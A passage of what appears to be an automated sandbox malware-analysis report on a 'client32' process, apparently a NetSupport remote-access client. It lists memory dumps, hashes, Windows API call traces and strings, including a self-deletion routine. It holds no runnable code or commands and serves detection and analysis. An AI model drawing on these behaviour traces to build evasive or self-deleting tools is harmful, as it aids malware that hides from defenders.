                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalCurrentSectionThread$EnterHookIncrementInterlockedLeaveWindowswsprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1508900759-0
                                                                                                                                                                                                    • Opcode ID: fca1b46b204764da65ebcedeecad0e2b38446ff2d182421d1514713d23eeeec3
                                                                                                                                                                                                    • Instruction ID: da2f38d9cbc473f07d4b13dca6b82d7cbc026d14235019096d9071f05e5fbb6d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fca1b46b204764da65ebcedeecad0e2b38446ff2d182421d1514713d23eeeec3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0E57AD4062527E200F6E47825BEEB3455F6035DF048072FA096A280E9717664CBE7
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,689D58A5,689F7218,00000008,689D5A49,?,?,?,689F7238,0000000C,689D5B04,?), ref: 689D6088
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                                                                                    • Opcode ID: adb144a28f8b83f1c7a7eedf518151a204718ae7a7decebfd1de558f06024669
                                                                                                                                                                                                    • Instruction ID: 576b965404aa79700ffc1f291c93def55d986c3ad0287cf08f35f5653f91a1ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: adb144a28f8b83f1c7a7eedf518151a204718ae7a7decebfd1de558f06024669
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC092B03893039BFB5C5B38AE16B4E25986B0EB52FA0402DB217D96C4DBE09450AA04
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70080837782.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70080804166.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70080871235.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70080906135.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_400000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Client32@8
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 433899448-0
                                                                                                                                                                                                    • Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                                                                                    • Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 32694325-0
                                                                                                                                                                                                    • Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                                                                                    • Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,110B7069,?,1119DD14), ref: 111665B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 39696e6d25aa7ac0e21d789071e397267f2798b2839d93ba8aa49f10ff34e9cf
                                                                                                                                                                                                    • Instruction ID: 296e91402cad22b18ee9dfb762b3befe9381d00e4202b5104261f8b257269074
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39696e6d25aa7ac0e21d789071e397267f2798b2839d93ba8aa49f10ff34e9cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56E0EC3250016657C7124E79D941B49BF5DDB812B8F140B31F93CC61C4E7729952C391
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 1100776A
                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 11007771
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 1100779D
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110077AA
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078B4
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110078C2
                                                                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 110078D6
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110078E3
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078F5
                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 11007921
                                                                                                                                                                                                      • Part of subcall function 11002280: DeleteObject.GDI32(?), ref: 11002291
                                                                                                                                                                                                      • Part of subcall function 11002280: CreatePen.GDI32(?,?,?), ref: 110022B8
                                                                                                                                                                                                      • Part of subcall function 11005AF0: CreateSolidBrush.GDI32(?), ref: 11005B17
                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1100794B
                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 11007960
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1100796D
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1100797A
                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007997
                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 110079C6
                                                                                                                                                                                                    • CreatePen.GDI32(00000002,00000001,00000000), ref: 110079D1
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11007AC2
                                                                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11007AD0
                                                                                                                                                                                                    • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007AE7
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: GetObjectA.GDI32(11003D26,00000018,?), ref: 1113E9E3
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: CreateCompatibleDC.GDI32(00000000), ref: 1113E9F1
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: CreateCompatibleDC.GDI32(00000000), ref: 1113E9F6
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EA0E
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1113EA21
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EA2C
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,?), ref: 1113EA36
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 1113EA53
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,00000000), ref: 1113EA5C
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetTextColor.GDI32(00000000,00FFFFFF), ref: 1113EA68
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 1113EA85
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,?), ref: 1113EA90
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetTextColor.GDI32(00000000,00000000), ref: 1113EA99
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 1113EAB6
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EAC1
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007BE5
                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 11007C1F
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000), ref: 11007C26
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007C33
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11007D76
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 11007DB3
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 11007DD3
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 11007DF0
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007E40
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007906
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 11007E72
                                                                                                                                                                                                    • SetCursor.USER32(?), ref: 11007E7F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdatewsprintf
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$|ZvZv
                                                                                                                                                                                                    • API String ID: 2899290145-901002432
                                                                                                                                                                                                    • Opcode ID: 32ac4362a435372818458c6baefe4143da28b80c04a0e07f18060c40f5c1fe2f
                                                                                                                                                                                                    • Instruction ID: 7fe4da3f96bb6b92752a65c8f73994b4eca8bbb8cb15b396b098bd7e1d307798
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32ac4362a435372818458c6baefe4143da28b80c04a0e07f18060c40f5c1fe2f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72272B5A00719AFE750DF64CC88FDEF7B9BB48708F1085A9E65A97280DB74A940CF50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 111235C6
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 111235E5
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112362B
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11123673
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,111B3308,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112369F
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236AC
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236C7
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 111236D7
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 111236F1
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112371D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112372E
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11123737
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112373A
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 11123770
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11123812
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123815
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123818
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112382C
                                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111238D4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileHandleProcess$CloseCreate$Current$ModuleName$ContextDuplicatePathTempThreadVersionWritewsprintf
                                                                                                                                                                                                    • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
